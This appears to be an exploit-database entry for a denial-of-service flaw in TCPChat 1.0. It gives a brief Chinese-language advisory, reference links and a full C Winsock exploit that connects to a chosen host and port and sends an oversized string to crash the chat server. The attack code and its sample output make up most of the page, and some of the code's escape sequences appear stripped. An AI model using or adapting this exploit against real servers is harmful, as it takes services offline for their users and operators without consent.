https://www.exploit-db.com/exploits/1090
https://www.securityfocus.com/bid/89793
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-001

TCPChat是一款小巧到聊天程序。TCPChat1.0中存在拒绝服务漏洞。远程攻击者可通过发送超长的聊天字符串，可能触发缓冲区溢出，导致程序崩溃，产生拒绝服务。

/*

TCP Chat(TCPX) DoS Exploit
----------------------------------------

Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed

Tested on Windows2000 SP4
Info: infamous.2hell.com / [email protected]

*/

#include <string.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"*** TCP Chat 1.0 DOS Exploit n"
"***-----------------------------------------------n"
"*** Infam0us Gr0up - Securiti Research Team nn"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n";


int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);
printf(" ------------------------------------------n", argv[0]);
printf(" Infam0us Gr0up - Securiti Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]);
printf("[?]Exam: %s localhost 1234n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 1234;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR n");
exit(1);
}
printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);
printf(" ------------------------------------------rnn", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED n", argv[0]);
exit(1);
}
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILEDn");
exit(1);
}
printf("[OK]n");
printf("Target lockedn");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERRORn");
closesocket(inetdos);
exit(1);
}
printf("[OK]n ");
printf("[+] Server DoS'edn");
closesocket(inetdos);
WSACleanup();
return 0;
}

// milw0rm.com [2005-07-06]

Jollybox.De Tcp Chat 1.0

来源:SECTRACK
名称:1014371
链接:http://securitytracker.com/id?1014371
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=65
来源:MISC
链接:http://addict3d.org/index.php?page=viewarticle&type;=security&ID;=4377